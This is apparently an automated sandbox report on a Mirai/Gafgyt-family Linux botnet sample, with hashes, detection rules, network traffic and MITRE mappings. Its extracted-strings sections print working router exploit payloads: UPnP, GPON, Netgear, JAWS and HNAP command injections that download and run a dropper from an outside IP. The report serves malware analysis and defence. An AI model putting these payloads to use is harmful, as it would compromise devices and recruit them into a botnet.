Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
yNGgbod6dt.elf

Overview

General Information

Sample Name:yNGgbod6dt.elf
Analysis ID:780227
MD5:62f1db29777c386f59a4836a2578e635
SHA1:0adc886845b8a3a549b6d41a16c7e1644ec15908
SHA256:2b68e82dada6e7bfa17c1ef77c4f03920d5644e34686a6e8a6ea5b809de70c1a
Tags:32elfgafgytMirai
Infos:
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Mirai
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Found strings indicative of a multi-platform dropper
Yara signature match
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:780227
Start date and time:2023-01-08 16:30:07 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 0s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:yNGgbod6dt.elf
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal76.spre.troj.linELF@0/0@0/0
  • No process behavior to analyse as no analysis process or sample was found
Command:/tmp/yNGgbod6dt.elf
PID:6230
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
SourceRuleDescriptionAuthorStrings
yNGgbod6dt.elfSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x1b2f8:$xo1: \x96\xB4\xA1\xB2\xB7\xB7\xBA\xF4\xEE\xF5\xEB
  • 0x1b3cc:$xo1: \x96\xB4\xA1\xB2\xB7\xB7\xBA\xF4\xEE\xF5\xEB
  • 0x1b454:$xo1: \x96\xB4\xA1\xB2\xB7\xB7\xBA\xF4\xEE\xF5\xEB
  • 0x1b4d0:$xo1: \x96\xB4\xA1\xB2\xB7\xB7\xBA\xF4\xEE\xF5\xEB
yNGgbod6dt.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    yNGgbod6dt.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
      yNGgbod6dt.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x18ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18f04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18f18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18f2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18f40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18f54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18f68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18f7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18f90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18fa4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18fb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18fcc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18fe0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x18ff4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19008:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1901c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19030:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19044:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x19058:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: yNGgbod6dt.elfReversingLabs: Detection: 41%
      Source: yNGgbod6dt.elfVirustotal: Detection: 49%Perma Link

      Spreading

      barindex
      Source: yNGgbod6dt.elfString: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
      Source: yNGgbod6dt.elfString: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>GET HTTP/1.1
      Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
      Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
      Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 190.173.195.220
      Source: unknownTCP traffic detected without corresponding DNS query: 190.173.195.220
      Source: unknownTCP traffic detected without corresponding DNS query: 190.107.216.65
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: yNGgbod6dt.elfString found in binary or memory: http://89.208.107.26/diag00/log21.mips
      Source: yNGgbod6dt.elfString found in binary or memory: http://89.208.107.26/miniupd.sh
      Source: yNGgbod6dt.elfString found in binary or memory: http://89.208.107.26/miniupd.sh;
      Source: yNGgbod6dt.elfString found in binary or memory: http://89.208.107.26/miniupd.sh;chmod$
      Source: yNGgbod6dt.elfString found in binary or memory: http://89.208.107.26/miniupd.sh;sh
      Source: yNGgbod6dt.elfString found in binary or memory: http://purenetworks.com/HNAP1/
      Source: yNGgbod6dt.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: yNGgbod6dt.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

      System Summary

      barindex
      Source: yNGgbod6dt.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: yNGgbod6dt.elf, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
      Source: yNGgbod6dt.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.208.107.26/miniupd.sh;chmod${IFS}777${IFS}miniupd.sh;sh${IFS}/tmp/miniupd.sh&>r&&tar${IFS}/string.js HTTP/1.0
      Source: Initial samplePotential command found: GET /shell?rm+-rf+/tmp/*;wget+http://89.208.107.26/miniupd.sh+-O+/tmp/jaws;sh+jaws HTTP/1.1
      Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.208.107.26/miniupd.sh;sh+/tmp/miniupd.sh
      Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://89.208.107.26/miniupd.sh+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
      Source: Initial samplePotential command found: GET /
      Source: Initial samplePotential command found: GET /%s HTTP/1.0
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>GET HTTP/1.1
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon80;sh+/tmp/gpon80&ipv=0
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/huawei;chmod -x /tmp/huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.208.107.26/diag00/log21.mips && chmod 777 log21.mips && ./log21.mips tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`rm -rf /tmp/* && /bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/msbin && chmod 777 /tmp/msbin && /tmp/msbin tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon80;sh+/tmp/gpon80&ipv=0GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.208.107.26/miniupd.sh;chmod${IFS}777${IFS}miniupd.sh;sh${IFS}/tmp/miniupd.sh&>r&&tar${IFS}/string.js HTTP/1.0
      Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.208.107.26/miniupd.sh;sh+/tmp/miniupd.shPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/huawei;chmod -x /tmp/huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /HNAP1/ HTTP/1.0
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.208.107.26/diag00/log21.mips && chmod 777 log21.mips && ./log21.mips tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /UD/act?1 HTTP/1.1
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`rm -rf /tmp/* && /bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/msbin && chmod 777 /tmp/msbin && /tmp/msbin tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>%d.%d.%d.%dGET /HEAD /POST /HTTP/1.1 404 Not FoundServer: ApacheContent-Length: %d
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.208.107.26 -l /tmp/.mupd -r diag00/log21.mips; /bin/busybox chmod 777 /tmp/.mupd; /tmp/.mupd selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: bin/busybox
      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.208.107.26 -l /tmp/.mupd -r diag00/log21.mips; /bin/busybox chmod 777 /tmp/.mupd; /tmp/.mupd selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
      Source: Initial sampleString containing 'busybox' found: Content-Length: h/bin/busybox/bin/watchdog/bin/systemdbin/busyboxbin/watchdogbin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
      Source: classification engineClassification label: mal76.spre.troj.linELF@0/0@0/0

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: yNGgbod6dt.elf, type: SAMPLE

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: yNGgbod6dt.elf, type: SAMPLE
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Command and Scripting Interpreter
      Path InterceptionPath Interception1
      Scripting
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Scripting
      Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Application Layer Protocol
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      No configs have been found
      SourceDetectionScannerLabelLink
      yNGgbod6dt.elf41%ReversingLabsLinux.Trojan.Gafgyt
      yNGgbod6dt.elf49%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://purenetworks.com/HNAP1/0%URL Reputationsafe
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://89.208.107.26/diag00/log21.mipsyNGgbod6dt.elffalse
        unknown
        http://89.208.107.26/miniupd.sh;chmod$yNGgbod6dt.elffalse
          unknown
          http://89.208.107.26/miniupd.sh;shyNGgbod6dt.elffalse
            unknown
            http://89.208.107.26/miniupd.shyNGgbod6dt.elftrue
              unknown
              http://89.208.107.26/miniupd.sh;yNGgbod6dt.elftrue
                unknown
                http://schemas.xmlsoap.org/soap/encoding/yNGgbod6dt.elffalse
                  high
                  http://purenetworks.com/HNAP1/yNGgbod6dt.elffalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/soap/envelope/yNGgbod6dt.elffalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    190.173.195.220
                    unknownArgentina
                    22927TelefonicadeArgentinaARfalse
                    190.107.216.65
                    unknownArgentina
                    52339LimaVideoCableSACabletelARfalse
                    109.202.202.202
                    unknownSwitzerland
                    13030INIT7CHfalse
                    91.189.91.43
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse
                    91.189.91.42
                    unknownUnited Kingdom
                    41231CANONICAL-ASGBfalse
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    109.202.202.2026beeLkLLDj.elfGet hashmaliciousBrowse
                      UriVm8Snef.elfGet hashmaliciousBrowse
                        8g1DY7z6g4.elfGet hashmaliciousBrowse
                          0cssuxlCHI.elfGet hashmaliciousBrowse
                            JPizdU1N6R.elfGet hashmaliciousBrowse
                              hiEBvCSBps.elfGet hashmaliciousBrowse
                                ZE2ZehwLOg.elfGet hashmaliciousBrowse
                                  MmFNpPhcFu.elfGet hashmaliciousBrowse
                                    Ffp4gnD2A8.elfGet hashmaliciousBrowse
                                      tNE3wBttWB.elfGet hashmaliciousBrowse
                                        0xzdoFh53o.elfGet hashmaliciousBrowse
                                          2IZIfvNeb2.elfGet hashmaliciousBrowse
                                            JgcR28z1x1.elfGet hashmaliciousBrowse
                                              8MNgRIy6bo.elfGet hashmaliciousBrowse
                                                XDNaGj68wF.elfGet hashmaliciousBrowse
                                                  QXONhqaW7U.elfGet hashmaliciousBrowse
                                                    g5udoka2nW.elfGet hashmaliciousBrowse
                                                      ZCPnX13uLT.elfGet hashmaliciousBrowse
                                                        L4pZpoOnJY.elfGet hashmaliciousBrowse
                                                          NSlnqwYbZT.elfGet hashmaliciousBrowse
                                                            91.189.91.436beeLkLLDj.elfGet hashmaliciousBrowse
                                                              UriVm8Snef.elfGet hashmaliciousBrowse
                                                                8g1DY7z6g4.elfGet hashmaliciousBrowse
                                                                  0cssuxlCHI.elfGet hashmaliciousBrowse
                                                                    JPizdU1N6R.elfGet hashmaliciousBrowse
                                                                      hiEBvCSBps.elfGet hashmaliciousBrowse
                                                                        ZE2ZehwLOg.elfGet hashmaliciousBrowse
                                                                          MmFNpPhcFu.elfGet hashmaliciousBrowse
                                                                            Ffp4gnD2A8.elfGet hashmaliciousBrowse
                                                                              tNE3wBttWB.elfGet hashmaliciousBrowse
                                                                                0xzdoFh53o.elfGet hashmaliciousBrowse
                                                                                  2IZIfvNeb2.elfGet hashmaliciousBrowse
                                                                                    JgcR28z1x1.elfGet hashmaliciousBrowse
                                                                                      8MNgRIy6bo.elfGet hashmaliciousBrowse
                                                                                        XDNaGj68wF.elfGet hashmaliciousBrowse
                                                                                          QXONhqaW7U.elfGet hashmaliciousBrowse
                                                                                            g5udoka2nW.elfGet hashmaliciousBrowse
                                                                                              ZCPnX13uLT.elfGet hashmaliciousBrowse
                                                                                                L4pZpoOnJY.elfGet hashmaliciousBrowse
                                                                                                  NSlnqwYbZT.elfGet hashmaliciousBrowse
                                                                                                    No context
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    LimaVideoCableSACabletelARboat.mpsl-20220930-1610.elfGet hashmaliciousBrowse
                                                                                                    • 190.151.151.89
                                                                                                    INIT7CH6beeLkLLDj.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    UriVm8Snef.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    8g1DY7z6g4.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    0cssuxlCHI.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    JPizdU1N6R.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    hiEBvCSBps.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    ZE2ZehwLOg.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    MmFNpPhcFu.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    Ffp4gnD2A8.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    tNE3wBttWB.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    0xzdoFh53o.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    2IZIfvNeb2.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    JgcR28z1x1.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    8MNgRIy6bo.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    XDNaGj68wF.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    QXONhqaW7U.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    g5udoka2nW.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    ZCPnX13uLT.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    L4pZpoOnJY.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    NSlnqwYbZT.elfGet hashmaliciousBrowse
                                                                                                    • 109.202.202.202
                                                                                                    TelefonicadeArgentinaARXsP344f0F0.elfGet hashmaliciousBrowse
                                                                                                    • 181.24.172.222
                                                                                                    AP7H3dk8Ul.elfGet hashmaliciousBrowse
                                                                                                    • 190.174.129.43
                                                                                                    p2TN9whN5w.elfGet hashmaliciousBrowse
